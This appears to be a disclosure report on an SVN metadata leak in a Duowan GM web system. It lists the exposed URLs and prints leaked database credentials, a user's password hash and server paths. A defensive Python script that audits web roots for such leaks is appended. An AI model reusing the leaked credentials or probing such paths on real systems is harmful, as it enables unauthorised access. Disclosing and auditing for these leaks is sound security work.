
Sensitive information disclosure in a Duowan GM system

2024-07-26 19:30:01

First, an SVN metadata leak:

http://qa.tank.duowan.com/manage/.svn/entries

Not many files could actually be read through the SVN data, but it was enough to learn the rough directory layout, and requesting the paths directly exposed the source code: http://qa.tank.duowan.com/manage/sql/dbcfg.py

HOST = '127.0.0.1'
USER = 'tkgame'
PAWD = 'tkgame'
PORT = 0
DBNAME = 'tkt_manage'
#
EXECUTETYPE = 'update'
BUILDSQL = 'table_defines.sql'
UPDATELOG = 'update.ini'
UPDATETABLE = '_db_update_log'
BUILDUPDATESQL = '_db_update_log.sql'
BACKUPSQLPREFIX = 'bk_'

Proof of vulnerability:

http://qa.tank.duowan.com/manage/sql/table_defines.sql

INSERT INTO `user` (`user_id`, `user_name`, `user_password`, `user_level`, `user_created`) VALUES
(1, 'sixcube', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866);

http://qa.tank.duowan.com/manage/i18n/config.sh

ROOT_PATH=/var/www/wwwroot/tkt/manage
I18N_PATH=$ROOT_PATH/i18n
I18N_DOMAIN=tkt_manage
LANG_LIST=(`/usr/bin/php -q getLangList.php`);
LEN_OF_LANG_LIST=${#LANG_LIST[@]}
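Both findings in this report (version-control metadata left under the document root, and source or deployment files such as dbcfg.py, table_defines.sql and config.sh reachable over HTTP) are the kind of defect a pre-deployment audit of the web root catches. The following Python script is an added example, not code from the original report or from Duowan: it walks a document root, flags VCS metadata directories and non-web files, and looks inside those files for hard-coded credential assignments (it includes the misspelt PAWD key seen in the leaked config) and 32-hex password hashes embedded in INSERT statements. The sample tree it builds under a temporary directory, the file contents and the regular expressions are constructed assumptions; the sample mirrors the report's layout but uses placeholder values.

```python
import os
import re
import tempfile

# Version-control metadata directories: never to be served from a web root.
VCS_DIRS = {".svn", ".git", ".hg", ".bzr"}

# Extensions of source/deployment artefacts that a web server would hand out
# as plain text if they sit under the document root (constructed list).
SOURCE_EXTS = {".py", ".sh", ".sql", ".ini", ".bak", ".old"}

# A secret-looking name assigned a quoted literal, e.g. PAWD = 'tkgame'.
# PAWD is included because it is the (misspelt) key in the leaked dbcfg.py.
CRED_RE = re.compile(
    r"^\s*(?P<name>[A-Za-z_]*(?:PASS(?:WORD|WD)?|PAWD|PWD|SECRET|TOKEN)[A-Za-z_]*)"
    r"\s*=\s*['\"](?P<value>[^'\"]*)['\"]",
    re.IGNORECASE | re.MULTILINE,
)

# A 32-hex-digit literal inside an INSERT: the shape of an unsalted MD5-style
# password hash dumped together with the schema.
MD5_IN_INSERT_RE = re.compile(r"INSERT INTO .*?'[0-9a-f]{32}'", re.IGNORECASE | re.DOTALL)


def audit_webroot(root):
    """Walk a document root and return (kind, relative_path, detail) findings.

    kinds: vcs_metadata, source_file, hardcoded_cred, password_hash
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in list(dirnames):
            if d in VCS_DIRS:
                rel = os.path.relpath(os.path.join(dirpath, d), root).replace(os.sep, "/")
                findings.append(("vcs_metadata", rel, "version-control metadata under web root"))
                dirnames.remove(d)  # the directory itself is the finding; do not descend
        for f in filenames:
            if os.path.splitext(f)[1].lower() not in SOURCE_EXTS:
                continue  # .php/.html etc. are web content, not the concern here
            path = os.path.join(dirpath, f)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            findings.append(("source_file", rel, "source/deployment file reachable over HTTP"))
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            for m in CRED_RE.finditer(text):
                findings.append(("hardcoded_cred", rel, "%s is a literal secret" % m.group("name")))
            if MD5_IN_INSERT_RE.search(text):
                findings.append(("password_hash", rel, "INSERT carries a 32-hex (MD5-style) hash"))
    return findings


# Constructed sample tree: same layout as the report, placeholder values.
SAMPLE_FILES = {
    "manage/.svn/entries": "12\n",
    "manage/sql/dbcfg.py": "HOST = '127.0.0.1'\nUSER = 'tkgame'\nPAWD = 'constructed-example'\n"
                           "PORT = 0\nDBNAME = 'tkt_manage'\n",
    "manage/sql/table_defines.sql": "INSERT INTO `user` (`user_id`, `user_name`, `user_password`) VALUES\n"
                                    "(1, 'admin', '0123456789abcdef0123456789abcdef');\n",
    "manage/i18n/config.sh": "ROOT_PATH=/var/www/wwwroot/tkt/manage\n",
    "manage/index.php": "<?php echo 'ok';\n",
}


def write_constructed_sample(base):
    """Materialise SAMPLE_FILES under base and return base."""
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return base


def audit_constructed_sample():
    """Build the sample tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        write_constructed_sample(tmp)
        return audit_webroot(tmp)


if __name__ == "__main__":
    for kind, rel, detail in audit_constructed_sample():
        print("%-15s %-30s %s" % (kind, rel, detail))
```

Run against a real deployment, the script is a release gate rather than a monitor: anything it reports should be fixed by exporting the tree without VCS metadata (`svn export` rather than a checkout) and keeping configuration and SQL outside the document root, with the web server additionally denying requests for `/.svn/`, `/.git/` and non-web extensions as defence in depth.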